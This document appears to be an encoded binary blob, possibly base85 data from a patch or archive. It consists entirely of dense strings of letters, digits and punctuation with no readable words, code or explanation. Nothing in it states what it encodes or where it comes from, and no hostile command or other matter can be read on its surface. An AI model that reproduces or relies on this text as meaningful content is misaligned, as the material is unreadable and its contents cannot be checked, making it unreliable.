zFeq1u<0HHw7swM@1qDI@P%sn=#Y1?`k0dClJrSD6?Tk#*u^NEO1)xDMa5V$I$q{%a zTY&pGp#&S?r);@?rvW?kmE(2Jp|L2Z$3m#@0lLLA{NazMClv5(oEk1%_-Q_chB>g7 z^HdkkOP*WHY5Hj|p)=s^NRige0Q5m^TbX<%YPTrs67-El|0TIT{rLh>H68mn10Qw?(GqMsoYkiI(_q+u*#c zxv{M%Zfq+8)MHFNIVWlgZO9HAe8}lT)kyL96^+}i+h5*ySqEVB|vZ(EV#S7LvRT0?j9K2g1fuB zyE}KXd-q%U^YmM%WqRtIYN_t7L)Wa>_*}tP9Ee66-!z?z!m{)O7li0_Ox3~Ot}wjXU4s%&`uyyUOP z1s|XHepi^(uuSG02nNH@y9WCWlorH8D9EjGl!xGdbf!?m3rLIw&axVzZU%o&qkIji z>_%6+Lcub$C?K`Y`|<|~H7j21+fStK_$5PUHiW!)Rcv~6$3yfgE*p}ck)_qqfwS%3 z`d=UKnTcHd<`nsCFHSRL7>wi7;1D0b7#Qeb81j6c%S#hB)4sl^X@y$JKJmCC7xEaE z@F89YGEq*uqvFIm4D5tVO~i1Jiu)&!z@h5;+8Slog;hBr)_(`|!X& z^|2z;v~3(gm4Hdfwx5A_@i4#c?+ola6(^Gj>!8U+;7fi$0yowI0pB$JFgnVEcYJ8U zOg+DtSPYxfe6n=Anqc7a-2regKtnDjaY_8vgOQ=^?JRAaDo3Rx$xqKuox`17zsEb} zFLWTYWcK-KXJt!GA(8uKSFxDu1l#_u!G3!O_`LM)}qkU~z=iv6uNnOc1&b56* zipNu0YKBWbSLEg#-(`Eo&Tc|Y?S;FVHJoP&NM!v6TfGrK&07BSRU~H@68Y%D2SlqzciC^S~pMuf3vtu6(;4GC#!WMx6aXf_Bfw^{?96bE*&1tL*9Kkoa z6vRdO4;nzVBIY3(H3nr9vQByRse7lL#w#HkwgK$(8P>Di^LfJ>J4Ohux3?F!5cRgFuTvtB|(G6C(*lo?5<5C8mG zG@sv<#2czZKDq6aJ9`@NhvoNjNhp16M)M~DK+BR}<38h$(S4o!6%`S>=W`Yt@pbh# zL6&vTJI}C2Umv3_01w9)KIdpuzT-~uHKESes)H)xmxVD_kFGR=wLbL)dz@-c=2wzK zVZO`F*zUX5Jpl?iA@WWyE?UedBLm_mHWUqivO6d(vL;*J18V3swr;iSjOxO}iB(=_ zIyb@({Pya0%-`}HW(x*gshZant4^0Z%G@|~=vkBmu2iP$VQJ^+wO6W2=L27(F2CqW z>swPBZo6t`Xa>XOa4I1&nT%)=TGT(7>K>WuXgx8-{w zr%SMRCVY!|Tun^eWh4f4Y&u?6ohZ!j086DC5oGbKx9sbDzDe7@=?<`nKD6a-NNzF0r+cKE z+Nk=byr0m|-g!UHo(bObCMQ(|o(?tJXfUb8T@X*Q8g!OfdCY%j-Tc%&Z{-Mwh2hi| z)Hhu!j)=u5Yk9QQF9j4`EI7_=(Z4GYN_G`DdWI<|zjp3HUs~(@IkcRxTKMv~y5(-l zykDBCa{{bmPi+`O*6VE|WU?M#cCL0{GRj`GE<#_#OmaRrpVlpRvGN&@p_6I3iSP%{ z;jPG_)4I5oy-YjwFsn`q=q>VG?7vAhaP4sfdO1##3DQ0s)Vb`ImK@SeGt@{$_qcpP zbIYpIJHk@Z8`jFs@ELLL(6Uo;QWbTZLwv4AJn&!?!=}_FE;9bAsZF*o)#&ntLHLK@ z^`54P;;ijK>)+QPb!LXc6hvA=21TUr7pv`b6BX)=_t=Xa^h|wpv>k*3Nf?V0Hq3{v0m zMAI7Id7vOSeC?f-%010jToY#N?YR{7Q}m1L_Sra4Vr95t1yBvO&2`O_OnLW1{F`2? zuyl+oEF4VUy>x=PcnvKeEoPZ75D2U=UKfAZquCQ&lXEgsr%-Txg`oY5^E-w zza&TDF`F`bAef%c58{!Ko@)}!ap>8EEibl8v84DH!ApFe-|CGetF(HVo+Ux3G}_%6 z^jC9kQrQl+hF$^|UI|^;E&+etoiO+r_D`StnZs=mnKe}tqhN$@I!G$C8dqn9UA%U% zocIsF&cxiG@2LMSh>U9DSrdAo+)D#TcJcj|(<#2Z?pd}(u%4~qt08~Ci?$~jf`)8s zR%jfft0Iy?ufI0t*Vq6dMTdj*f+4=HR@$z~+c!Sr_LYF(qK>+W+oY1!YEGxf$#DA| zW<2l8Lv6AG6V^@`cfVpnWu;>QM$^&l5*;~?Rxi0*0d19no{$pk9WFdIhl17kQZCkj!u$6ECYrLHzyQ7t;wg;9 z?R`Dw6d833>8I9ER26HrWnigGD={o>bE}?(KIFfS=(XK=3A5dMNiE!Z%k%l7`eBO;SQ8MCN`rh2dE~~t=?L%L;=XU!prnPCoW>F(>eucXVBVP9D3p@N!k_%|v3(LUK>fP?7 z{DaZ6Za8O>znyI=s$Y%n2>*xnr2#vZqfB$K=4|-BEr0*CI z-j}R{nF~Idt7uh&Eb^V z6|~x~uq&Fxf;d%9ku0zvYsJI+#iXVib`bD0VR}lF^wyR37N*Dg)nW2GC7h_aM#1M_ zJtYZMs=tMxF@%$qKJqdzoyNhEMgw~TaX)-Hpv8TE>yFS4QO^kj28O4V2F9i(V{MJg z^U4h>GSosdqK#0lDS(TKP9aK~>MnXB!ix?62$R*5D=G?X+XVDlU~S7m&YPf84QY zz|8B&jp1_al#)2f+P~1KNNFUxh~J?{G|OY--c&|UVVJ#dJyiWX zpBWv>Jr1gZn)-DVWprjfK_|CCAo^A8S*P)%w05}vmZpSQq2ST`UfsIbhL}^UX+tMp zLU72)D3yJO%>xf8QHfe1Iw~4@oI0e>A07A%Sr3avcUbt#-iVCjLT1irKqe7gRhMs< z!t!cSA>WVW_0T~1apr$re01B-cAX{PGn(epI#-<=UdBtrPb3aZXrG@x6qhz~FGWAT+UYi& zC!AM7^e%)aEk^V!BS55Rt*KP2YBpgQwc0>gdGguH{bhYr5gM400gsoH)Uzg>^sKrU z(mVa=ugnM&h>oML=n98w;P+ffB8%4jAgWLH_Q7)$T+v&#l0lSZ5vStg+|Aovu^$(6 zljFqYl-z~Uy0Q$ivLa4t@xrt-0F7COZaeCBD!3d{du8Rn?es|$?4LHWMgsLB%mv44 z@q{9tVRSkNW00T}p8Wuu`S=YcTiMG>LXxk&Yy6{SJ!TF1Jzsk+CJOTa~ z`&5N5m~WSwpZ-#cyc(erjs50)@sc5xn`y{vcD;REYK>v$sB8u)r`wvjSY^B_Yt)rP zm+xr!0Tn^R67w@P*}HMntfyT@Nml3wi>&v>fhBzxQkxoQw!Y!v5pvsrDwj1^BUgi& z%EQhV2<~=7^S-@wsxRw}FK8bET~!BD(t&L8TyIk_IX+}rxzB70H%k@m_>p?0Y1y>I zUT2Fx5IBds`FCx9JKS-fIb!YFG1GXMF+H^)ewb~8U zP_%{3UT^em4<!u|ojW7-q7n_vO|WpE*qswJFjN0l!O z=`;IL%gIkaDsyCGcvyOHNW6uPJ_5@5vU&k~cK)PM$E~Q}D%es2^qMq0z>E6m{GH!| z>hca-(^Zhw6>?hk^fJu(9jUBs3C-TcWw8yr*WpVF@_EkV*>1~U6l#sY2*FX+t6Ph~ zs>Q)}XzrR0TXS>OEBBD2CQM?D2+NCjw>m>4+*|#!&e}Ye-e0cygNDQL?N3F^UrQ|s zBaZli?!})$5ifBYquiTKl(}S;C@LPy5=}6yCM}?g=gF+6Kp#90|4!BGNGIURBKl-g zS&r_0(&y0p)%^;?spTH+Q9noy>KNz@pdpny%7er0iu6LW?l%#bfdvMkq>G`o<+kN+$QDwVF}S z38yRVH>u-5iOv?l7dA)2*Kzb5f4?aVO(iskNe9x+gY97m&6|j*J|V{3{S{;WK5#&# zRpm0MOJZ>1+m+`zT8G20r{()lWV8FnX8CuMK*qKM7-7NjY6D$tkklw8+GkWtu>* zQ_>qBwg<~kBf|T5sp^}#R;WN9c3G)9DQCWJ%NC7`6{&Dy#yVP!Mn~3cpt1kCP5Q?UmA`CBJjCX8HJ1K3E*-x?1&IRNB%1tYu$fh2Dm4@#feu`NIAj zSaM$BGh@hSd1%|RT`IOG%0C_^R-3=q(Mln2(UTSih`n$(abcTbgpSla%78oO zmH2$!60ajbMT&-vRoU*%?Pu*Ny(4OT5I;SZE28ReU)Pn7>A18@KuDv7V{hR&wtLWE zf1v&vCc67WahG5Rb$L0_;;lqNV^Q@nbz&-gM8q(_Aq^%&^H(tp1Gn4gCXrqY!N$KjK|!!q(5Vd_eY!)03HWRs=kUq1c-Y%A&xu%yv^ zF_c>0wLbH}ULAUS?MRa$ehoZPGs=%h$p)4`lrVSoVE>x*cpc__%e%hr<-fM^X0GU| z_8_)a)qUpb`j#V*%*Jhdw|A7eI8x(I&Zd|!I9zP$9)5&e!VfTVjjB-d<8w}oX?O3v zwO%ES)kdQ(qr^X6@Olwzl04&y<(_o^nUyVXWH1EA-?N6`l zo+|!9T6~q^KK)Y<^5PFG<@R~J#98TYq{Dc#zsR^%)8$#D5g1}BjW|7T9AaRA=mGC& z7JZU2z2Ig4q~iheW#ylRsuMy~Ok@_A?Zk$F2JORH9-V=oP3#kaj(o&cs@$-`K$klEPE5rNJ` zcT;)y9X9Z)NfVoz6zFz0rgmN-h7AZgK7<<`wdX%3eWK{>x%Z?;-ND*0;4Vj@5CP$r zt?sIg2bu2+W|+`ElH^nsH8~2OT%EJq&cy~3s}T;I;M#!AwA_SH!LDD;v6!Ll8y}R) zyZaqOiw#MO)!OQ^C(1TM)@_Xn+S<0-^NR1}1x{gCHmO;JY=!P=Y81AW z&YPd;U`JQobX|39>Bl>I4&5Ja8f|6}-UG{;Ff>d<2v~lb*s(rnF8aV7U37t&xPgJ4 zb-@2rl~@o4xOmA^A3L|!gUif{kjSHnLVyMd`;9^t3?}n~1x_m+MP`O{9n}af*u@@7 zLzN2?(`_x3hc6-q@uJ!HsM%PO5cghXz$Dbc+4xE=%j=?J9ucL7;qrY`*mJUq@4lj5 zbzacrq?kXEsWtrwj?~lj{f(V87WJ7rHuJe8QgK@ zrc6CN?*N@?+M@{tWnVu6(?|sujohF0U~{)Wi4cCbwj*yNt9^NIe&^L2TZfWVO;JOR zhj_uEm+&o~bi{D7`Adw;qQg&mQQ=lz3CtALfMZT_|5A?W*owB54$)>;; zfRz@m^=>Er^82ZX4$-S{#r*7%NjDAID$<{ru&rX)jAu)VDC#9DR7e?JsiB+kVDX=? z>gbeQR91>mA7)AXg9$D>~ zeM&Vfb0XmTXg`855|cQQ4w63FM`adFeoaxT9kHpNv3)-_G-0%8|2_7~PE4?jmKOcN zVqyDj#r_+hm4;C)F}X~-9*^=8PS3${TIWJk-Zq)Ut&oIUJ28WNgphKCuxbdHPGQGX z(+u^hVeUBq=Q)7jIS}qS5a~(v%aba?lZw`}(sY}Y|Lj}5H7OKM| zf5Thp(pkwaptR}7oOa*+#E&}wd7R1^Z*MSbvuwRd@lUz%pQ9f6jP>H$rjd<_5shQ0 zHnh9xhY^inX4!_3^MRSqnd~}*CEA>;BhagKP^)wjt60ApvzS+01I$-NryC`7E<^Hd zy35dPASVp_xvVH0nRYV28!#Z7KQN)5>C!D}Gp=ZpuV~Y+Xj8A8qMqvxa4tqZK$x|d zGuz{ddj&Yv8P;$j@Y3^`74mINT0L+hJaEH5a7R9PNxW){ziLE0G(|kTHtThn3)`=V zzXmvkgM@nc1LUD{zpoXC;|i}?A`5lbtat18t1_`G3*eDT$;o?6iIehoOP358LevSsgLx%u;O8}I!-QhdOL&8X^rjf*hN@kWK%Op-!^sHTo zgC_u|#H`Q3Q=OpXu+M>yB4+k>ho_@^zLO>f-ChrE5T1uQau+I7qt5|iqGE>!{IHfs zq1!{AfO@NaVi+`}m;DaV6Pvux-v~6K-wSxE@m`5{nk~`W%*^uxuZ1id!ic-_r7RnX2)m3*2JJ4YICg@V0~zNkST*qoyI%;=XT~yP6 z>kk4utM;Lo-7^nwJjvlf1MZB_sJq*}*;?EoNK(@lVYoG0@Q@cMx<1qtxvcdkLqtcRE5Gv z%zivy(dO{&?-qMcIA^%SYU-Qb3&wkoB_gNZOe+hijD*QNW6%;4hd33ij#0FbH}goj zLZuarq$4z2h}`-gKxTby05d23anC?Q0I`n6#D!MrY^*&5p?2{dEE!A?`G_I6J|Gz) z3sO~Z5gwLro8mBLhc16Vz}{Hux22jCFA2TBI)pCRop&xam@b^EU=BPi`?fe0LI0Y1 zHIpRaBh5_di8jPkkw`_r0$3F^0Co&7ZY?NJ)$o}hf5J}9i|_|jgSTRt zWB<4(ASd`4oDgYmj5BRs#RR*@9H0m8Oh08KQUm3Q`Qv_! zlz=N(CDgthWdgG&K$J%YikNf_eyvkn;kW&m^&ZpwfbNtD_mrTB9fT+Ql(zo`bb0od zV6gyuJd_x4(GO;d577bQ%oEtdrwiY;wU10Bkqo2Zg7Wd#ywP_NVz3vIsW5*bq&p3f z`88eXl@M!P>DiDs9qF-NDoAy8C^p5l)v41Q)S%wgr20V5kzA(SAa|$a%yJhbaCN$=JdrSP`Q6-j&|Fpm&0`UEe^UrTaE?f^ z`hC?Za(qo*5h-xOFC5rMIJrh1VFVtVST_wZ*He7pN8-5&{t7UB&_}AdvpDBNyM~h2 z-|z^3m$>Xf+VV|7X>{gT6&3#Glcz@DWFK3e>G$)(Gg58 zeoL)9z@c9KEku1SACq}8qH8Wf!``Xb(Wy9Oc$Tjb!V!OpK0pup&N6oqtOM)FMQ6pe z%DqFq{Tuy8DW;owe-^+YMSX32n8;S2sEIiz;rQSGm!H}<&20i(N4!(dZ36EgJQ8BM z{#xZ;qTVh?zfpyGIUVt6+5g(GVC zk&F0^Qwo)163<3-O-IC9^;0+Oe5-mYRQHZZ*o2wS`C2aA>y!F-ocX}m)I59Pn!(xQ zKO2M(_)(;YKEw-K%2R~8w;DasLPU*4{~~Y)A8;*S^@K%j2Rr{sUFu6w`tkL#EV#{y zh`L_%wjstXZ}if?6ZXz0ml*6F#T13|JAYrqJN{h1ZM4sFOwjIkS@d55 zcQ%1L$bf69swZRxUxe};&=%NBec4JsoPK0Uj~%jIT<9nqgdA89s_y7gMF{16l>%|=mG+%sayY15yO z3CT=9zJsaQu&l+aqS8kbgQ|ORP;ads?+&H8C}djyo!TkMEh;O%0GE-GMH6L>O~Kgt zf#jtn+Db{<;b+BRRGSgBNg&W~Xf!5L=jzCo?Z#2ePq_)kEq`>J+QOMNk>|#+SQc(B2Q2##wJ^RR8Q3}u+$Cm6$e;tN2&xt$dKC_9rsoH2z9+8Xy? zo`rX}D?YjUfAP0M`VE@_AK%S{N8xk_JV9d{S zC!MvM7}{H*!)TxAhNsqiK)9Z|Ci?zlMKjhYs~{Q(2nNQd<)?($uESMXD(UgUA3yF` zS0nRhMBMKta*llE3>I9iYgT~be&VacVP96cBqBZ=fpYnBJ$Zl&fIJ)^itFJXT}+Yx|nxv%lCa6?+mX$ z0*aoFxGRg)UfroeT4ch6D$SV5g?G?5kUb@T1(Q;qpbD7{V@Eiim4ONF5gJC`1nb-_N*1 z1)Lyw!0OnR1C3J7usoDd7oHa&V}gYWeA0Ny0bV4S5Z~QW7{yf6*Akc(Qlg%!bm`%3 zqFXA^U+?}o=^Pj`qEe|9fFy5GOc!`{_yUKIm^|2594xRnJ8|7Iak}cn_()7rbwIUR zlyJRf$-Xr4a;u%F+r#&;nSZbNH3|{N5$9b_^7G|LgKQ;fPO1x(S@px`&dUENrAYq; zk9P*6G(MCW@6lRsXOuEaP&uo}aV(8|Fq6%<{)GR~5H!v!nwR@uLB%M+5&l}vTZ8?i z9(L98f$Sa5{q7vdH(tv#+?Ha9CzEbw6+`4mnWXL?KzMV$vb%ZKQRvyFm8&y=qfpc&8+hELqYgwH7 zICsh@ZRvKjfogH9HWK$Ytn#|3F64+ALoIi!NtR^rc)Bxp7?PeC3ox>?=Hh~J7&dZe zpW%2#Z4Jl0*#&fQAp=4W?CX2IBJmzXwdKP+>#VH`G$>BLxV*Gjr16#SYC_;G*VY`% z&&;kr#ier@1P4WU4+$Vmv^F7%)`TSh<5`WT3Ik4E7rRr1P<#)M+@(EHjj!jNkV9F#IcbKPlVgYkxAIgjmrJ$mdT$A3He^tJt?@|5>*=U`ljQ4~Y z!l;vFfs|Dr=Q1vpIm$zN412&QZ^6~!YN_VOV^B((JnM=t%0>$Nn3xCyGCwx>ui9Hw ze>i^Xf8uxb09L_Eo3MfIs8?uX_P(H)_TWu+UX}h5d$7x?&7R_>p$W1@4=cxSM4+HJ zKE@hp1FJ~r0UH|!a(o_dVi{eqd&{pLw=YJplA&j`k*{bxA%gq)olpt}idr)%-Lz-4 zav)pQlHbqZhIHg~T|c($SnW!pP&@G+Szo84bI*_*57^bHZjgF1;VzY;g;553cHx>Y~RWfxw$_CMl$gI(Duipg@Z0k z^>!5XUv{lCZe?r7fzq|(Rf&5x)oQ<+c!}4dvwUSXE~?cU`St9ZwiSAJ*EwZ%nxV3- znES*P_TO#i)784|z=cX~e4C8Ni@NpUy+PJ$cX|FR?SRR$_RVM=C)_Ka?nBUkz>UbR zV4KLGhEhT4K)iQ2scAyouD%Xi)Bkijzf%JUemC#A5ANE4O<;X1m#`_&DGSj9mf9p% z0hZJvS0s;TMXLdGT(TD<3+GeiSV7z)R*FES9tM|kubJ}z(A}aGDF}-Hpz#m-|6oSn z(8&4swox6J;%Z%W$GpD8n$4I`kL z^gl@bgXBLzKWJ{_Ub|lZu#f+9SgqnhpA$3%>1{f_z|_GfFhpA&?@Niaf%5{?{AjwHdY`PTGQ#*u8DrSb+Fd z6Y@JadXL@Lp!Hn)A49I+q*c2mCk{_wOsezeeA*SAD9(0$(#Z{oFJ}qhU)^&Kq?ZO? z1td^MFtjENBFG?r2khNl?i>4uA@kyH1&ArYxDUl8fDVkaIZDmB3XjSVMkLZ8?FY+=34L+j#e(ssd`nq7L+%K3I+luLMrZf#ue} zpok-@o!iFS(*Fu_`l9R!@5kg=Ef1w#^S5z)+ipR#pvJ>e30}J=U?#WqTq6MxCr;CP z#+3kAN{N*LT$g0D4DV-d$oh{dmQ9LMB*5@5;d(11=#*n`=+Ik+hM2l}O5uI@vfAA) znz|YX!rDJ<{lnfr9R0%?5U~2N1>dEo>=-M&nLgN)@3<(e3p3dO`-p&=8)=P))m3P!S#W>ZVJ@;Oy%WJ7!M#X9$>+DR4Iz(Kq;u&fsntJz{U;xj6E)B)k3Fllg zBuLa1PPFoG*XY}iG`ouQ&pV6kkhc=WTZTPhpL8?Q&*NDE#An5v60I@67lHBkh`3Ux z)Po~`3OeW;EZGRwi6LA}WN$~wezELKrR$&6W~u^X!yuFWKU0PmEVFJCG4ztSuwmL2!l?$>be<%YIyI{c zs1Nyn0o0#d*@F1Q4G9V$OnN;h?yG+R`O zbI7VRJndS+yJEXm;3jiIR0aAf{LIY}p;248$s80*edqCWgaAeu3I}eP6PPM2AjO5L z%zEa0esbSBSs8vkVD5Kw$M06!3JJ#WT`_R0p;FACgy!`U*`1#@XDJPn4!$_4gYZ`5 z6tU=7Qqn}!l`(Mw3Yw&(9+|bWqBlGSMZtRxJ(ewcR&B!W{Q@Mkyc^P7NHTyJY+wJ0 zT3-mZl3GL>(4hqynxuy*4-{f17@!bK1cg|N3Mj;WD{siB4VR#izCRtlHmLv7$J+fR z7o19V7y=-PzZGTl9P-G+;@oTh5sBrfS1JL|%RHAK6o-xXyot*qnVwnjUGg$$?MI1) zK_ah%LA;jUq%lgH?6M1Q+lGP0*Npv)D?H*s0t76E(Rg8J4=QpL#GE}oZP;37@AhpS zSV)th8y4I4cQJyY~d5db=+(bc=nR0D`CAZ9J=`A zfJTrHAyGi_49`1^Hz8I4rxOM7c^_0`-VDe22792b)B>gU!M%`a z2q{E%^UR$t2>0GAgpdBk+T}~s7hWu<*=L6m#2Ee_2lyC%Ga)P|#b*aIass#DT{Hr> z32%l2$lh3f?X6~Vf|RXhrvoEaVkzIXWjbQF#*wh7suhP4Y-%H+ySD}>p!W)D?Drds z5^j(|_pPB`SLpng6xDOXY(@fWj$s>o?Dt}S@`PbqWgY{?0U8QPz<9}rG01`QR79mP zD<79+Pr^Q^IM17&Y%so9*VOB@M!oQj@1>*pv7_JILuN|$N!mq^XB|=W^6p%C;p~)N z+VT3DXngd(>}V$n)r6W${NmJ+{sj*Q&-&?h@rj)E+AZC^>G8$*`lrYePaJMM*-^=;fMwH8aSl)%nl(coF6i-X$X2pDv8-1{NooTl`xPm6%gUEIGomgVbazav1|PJ9FaadpK!-5~Vd`0-}3X8n>}0`DdGtc(#w| zWY=}$5ZnRDGc4h_A8j`G5uGRLw+=?yS&k&{8DkR7YDs6 z%6?9UH1}{e?l8KiSa5tLw>{tZ&@tV+{@B+UyuaFZ?3F-G=^|g6-OJfYE?k*n&=66% zy-}H+Q2UDhonKRH{Igm1SS>>xvqMro%Oj2M5Clt{;1AEhU+|_9MA&IdBK>W_U#xPy zoHIKOKLWLG()*5m&<+I<_QU*zF)57MEh(|%Cd)#iSe!;-gJSJi;ISOz!=26~V;TaW z(3iL*CM|fcG-^8~XOQq}xE(Cy0&c%FY?$oa#ZI{~(%(9~p@b&Xq%b|O5En`6!p|+# zt$3k&P_;Cs)DRqf8+JzfyHcJO!=+9ixWYiTSPpLj#LpY(S|7Gz{x&YYAaX8MDv@CG zL$075Yf>^{kuHxbZVeXr<;N&Vtk}6hsXPgDLDt$Iv>T#1--zZ(%^vF~jJSJiiMP4Fp85Q9#M%!S!j>#41SwX~B8EvT z#`$|mqAAj2_$YURFNq@3Kc%n|> zLIj%2o-)w&TYmgnrbinLnE&j6lswS0s# zp)G0U;)8!Uep@#BYjbR$2@P-nTrqy&d(i^>mdy;iXxX^jM9b*9>bRq(LD;Ioa zS!a3(int~$^4BeGl4ifNOVI+UGg0qIfyMadc^(BxfaPv!Pt~e*PL_y^A+`8wa{#Ag z*?emyhgYSt*EFWs?f@+?KFE4bK(Fka2t$sXdI%_~yZ4h{UfBu~hTl9CfX~YlgH;aP z`Fq`Cjoj;(>${tOyd|?A;E!I>~)v}fJ9kgRy7DHg3->a(det)l^ zq6JDVixVhW34d{zL8PJw2F?ZCAp%|1$|G&F^5=vU3B_-V%ZKuU%6!w6+kB2tUa|q~ zU*w8lZxhqqmVUha=v02SUt;kD`yec~8hRYivaq;=u3R_1D~j&xT6_=O#6xO!iJ-6`Lj*H$10G zLavy8@jWBIvBL;YqS$a1aSw}@krde~XG+#IQoSv6{-z8%{t~BYxnx$;8lUkRkBoeQ zrJ`iE5Mue!sP)}q)*>0;l{!CA4y2w%IN|_4005|rN>(|A*q zjSTn*>6R>DwKC`P=eZJ=#VqaVNj_Ep>DNY&(Jjvbj|ea2fYtqnf1X}l_kGC%v~Bv} za$?c}2iH!IL`rQGUJ{mwi#nW1|mS z)0iek0BW_QV_{m|H+d4yXaga^D^?* z>cuagp7(U6cjkJMo%d`HIi3M3)xJxfQ+A6v%jNQo=V5slC?=K<9y`-f}HO=_2bH>^h9aH|(sQ6Jf>c(lG~QpId?P0xyeuhVg=T=fQuxThL0E zdaSTnD}Xhh1Q}qD|1PIXAh+PM6t^y) z)a?=K%Pzrqfs}=1+RpU1K_h3yw1a88qqUZFDaEPP14|;oZ;zAn0(_;74zbyVFCHMX z(g$oCMr?Mz$3Cbq9q2e-P-3pqvNQcyr#O8MvQ19E??*^c6NZ`Fh8#@a-c=xs7hqc` z7wt@^Hm4kY$c`7J91lRJOV!LwVwn?l$ad-GdN^x>s;5JenMeQj$mQkk-`v?m2@q8l z$;Jy7E&9p&$pyu1H48nQgDG5x#|zvnbdnCHy*O%QuaB;qACH^V(xr%} zn6a#g?x!TMEkJCIWh!@k0z{@XNt#Xe$RQZ}|kd7(+$Ldlgfe53aRZEUo zp#oSdjM)4g;gS!)cmcDyO4h-2inCPK&UEEdjd>QR!f?(3#U6K@Nhh4KoyAJ`=~A1e zpt`p^j`18XxI9XR0kPB#^vB)ix`WEABbHtYJ-C7VSSpXGprIlBkrT8ocDbuAq%U;>W z$vd3wqYvWsUJU<{4uHscYk#|1IpC(xK1%(Y;j(T;*}N@Az-;Yr;aUF*)MyC2{OH02q2#E7 z&%3nGZ<{U7Q?pI7eM63!8$T&r(H^s*l?|PoX0>)H(Y|FL8!?A#4)Gt(X^_QV;eR?M zk;Kz{G(LcO(*m1_J^>bJb-znK7}+S%#5$k3Ws`qJ7rr5yKHuF?qRE-Qhc!s|DXe@J zv{LMlxV>X@$Wp}YlYcUHpoNFI&3wwAqsfr;PKADcDtETY)D|57{G90(GV#wEf@_O{ zfB4F7(Rc^FX%xymd$rIqR`~<|+2r8LJAUM~rkHy!R7K0h)5>dC?($tQBR<|ujd<%Z zzWdKtp+(%0X>@Wy&P@@=Nzmz-v!gF{>G{(-&h!Rj-tL#PUaMGpG`Df)59gujqFI*xQE^$~rZMI#dFS0ilaMKA_)t&~G>~eL95$t%k7ny68 z`TLX{Y0MPz*m#l3waO?ZM3-v-_@^R4H)9DHqwDIroN5PucJiMyHT*!uCWW3ZHFHyM z_T7x(pRUVG8@y4vS!XMK)h=hUW+~AY!-g8vZCrI$gl&>_qXQ3%b^o>YqBv;j82+UH zS~`7#34b-ntoFZt>##2Jbf3ChQ}Rn8aUv|MB`NQZ?C#R&JxE4yKI9|O+<6gv|7xg} zug-)8*L#kVuL;_?F7d?67M?hHXVwCN;w*d-4o|OV@QGGwunhszOs!!$qSb}3@f#Ah zd9ZojD5ID0`qRDLyhxe7L*cp1GeldDU|q0Jf1Xd8`AL=;-O z6bv4dBoEXkU=!|5a*LZRXVe0UH=3jbb?*uM61JWA%D4L!ybBe;EqW?x z4tlbJUza2Y%Jsz+*ihxaiSYE_5cFS$O#Lqe;V?NN53RvI`S@@CPuPmMLjJ*zTlYVM zG3F*|Lmj3hhI;$f{eJ=RhFaLZhg&of#J4uFz?dg$cx~GDD0nv@6G{x``>8S+i~ycyY>v<-StO@&E(m$hj&0r zL7{f|H|ZYvF3Pr*0G@;NWZX>+DTI49?5_ypO}C{2o`dkD+IJ#4X)*b}3<^k~mZT|tv zk7wAJvPJ@^v2We~58-~2f#fwn0*F0Q5u*Rb@23)4o)42zgKlD&xBrQMSKS^^SAx+u?A_6f-pX@-!_e=9&zseNyrbLEfApW6~GRm z9GipDNw%S+dBD*W{GmExcJKLO7EgKfYIdJ!wxqy?5uTKW4juEIbrcd~Mh#4;sJ~u0 z_{Tze6Kw5*bQpvVDg zH!=9z|Hgl}&d2|3u)^iLU4Hy9ca9_fA7gJF6j`)oc|+k&;qF>cxVscqxVyW%yF=mb z?(XjH?wU9h?wY{I^!ui#yJ!0Ki^y2&ECb~2HHLW;K zFAu<$TTQ_gmD#4R3&9nO*(Q7^Ybfmv!4;Q(!<9SM2JIPN%WixY8>pxa!F`w6)-PPS zlNG-N?b>(%x*op?Uir*+K;7Fwb$JTdvY%W)c5UUh;NH6gZrjXmRD~YP&-e~(A*^=@ zda|2cL0)X-cHuU$U#zd3fcG=%fwA@!OU*e7sQ#_?lu9jW zpz??KXr3>_w8W|e;188)jD%(^u~OR!sF zCcpv1K2}N;DwZ)4kr+MF1jLs`ee#5?K6CC{Zi8QPLQ|xUxC^6(B!Q_D#7l@gVV;x; zR9n&*haV$om^S4cPy$oFak4zuU5T|uYR{zmf0A86tErt|6IcO?Z1|w{+ALn zpFvO^g5JM#os_NM{rq(1L^VUxO}2GCHlO`In=*I{cm$y{_BH!q`=y3*TIyQPo87Ih z``wYa_yFV{wvQ?|#{e2)QhkelcNiL!P8bi0z)zhCai_sw_k)ub-z!b@o5WQj44TYT z8u~jpKD;CFMd22-HYmCJt&Hz~XyX+;oxU=kLbg-)b7~pLhDWP2VV;{Cypq?ao2RU% zM;SR`HVBhEG2oKjVuc&ui#(o79B8A=oOqJO&BciGi}Hs6=DdXzu-+r#jc%*Sgt5EQ z3%`F{`PG$?bFV5|=rOS~c`&c_pXk)5y}Y9clC( z(H=Yp-k$byYA_1TluArG$`BGs^cNmmupWykAo9zMpNPd^N+SMA7DN2AFqZhI5rweE zs8vW~Y#Y2e@mEqpyb_}kSz8z}sRV+sXuL5zwgjEYsQCP3Y+PY5alz=9A)>-;g!b29 zl&U`N%fJYUB+-Q0+^z54uJ?{}Y-cQ% zNe_Z&Bg;8en1fp18~7>alT9m{x{Th|l5sqh&kgGa&fOn_A93Ec9x>0aHe%NH@%Ql> z@FVam@LM>2_BqaRl(g)%95=ID#rAb#-WcgfeN4QZflD_lLp^x1DEHdeHBjXM zv-MQHl`*`-64JgI+(0)IN2;p`=puMPU4MFXZ|LXRIHAA25%;3B8hc$k_|vgJp+6A% zK#ZXq@e&~HN%l2M_kT&f3-6}l?!uOQDLc;1Tv&{#7t3A&_BP1V%k0b_H=1?qzz3{z z!oYXKT3`6b82$GsyQ^=UZ0Du}K5X~&7%z3BF(U4DRP-2!L;0O*6f@vYPy*HXZyR+z zUt;ftw|d#@0@chd*9~^~4@vc6-ULAM+EY;?9uDSZawMXL?&HO@x(yDI(h=C-l+qJC z3>9>{En?2xi}Y%L$oYI5mlSY^p`r&pB+u;x&#d`1NJ+x?{U$t2_LmpQsqC-!@KXNo z50oe`fHLU=-?GT-9)9u(X`wa=Dt4Gdio8v-#EhW3ZKSt{0iX9;UHqM3%m$-NIt&sTy&nmd)nyBW@)5ExR4O`oS*%d zFlx;(^esYf#jeqkW1SW60w>x9L98RBKzm@Wde`iq+nH;Jex7JNV%TQ7kn1V_kH)#) z|1#ddGa_DIvx=D%b@s&k@)XGS|gR%m^|1G^YnSO7hWasQKZ_@of3AKR#AKg=f-22ha`61q9 z`#uzFKmQ%=2ukz_7!VGnggF=Frdbl1|0AvpuxtYEsMs zZ@15L7K7hZwn=-x4+b9R6YUI)9Ccv-v(wFZ3cp)dPKqnFl0E z)D60gkn{O>Gbe&%lRZLSmhqHYly|7K1nU8Yrgh2Q%E$l)|F!pI1qFU+PnO 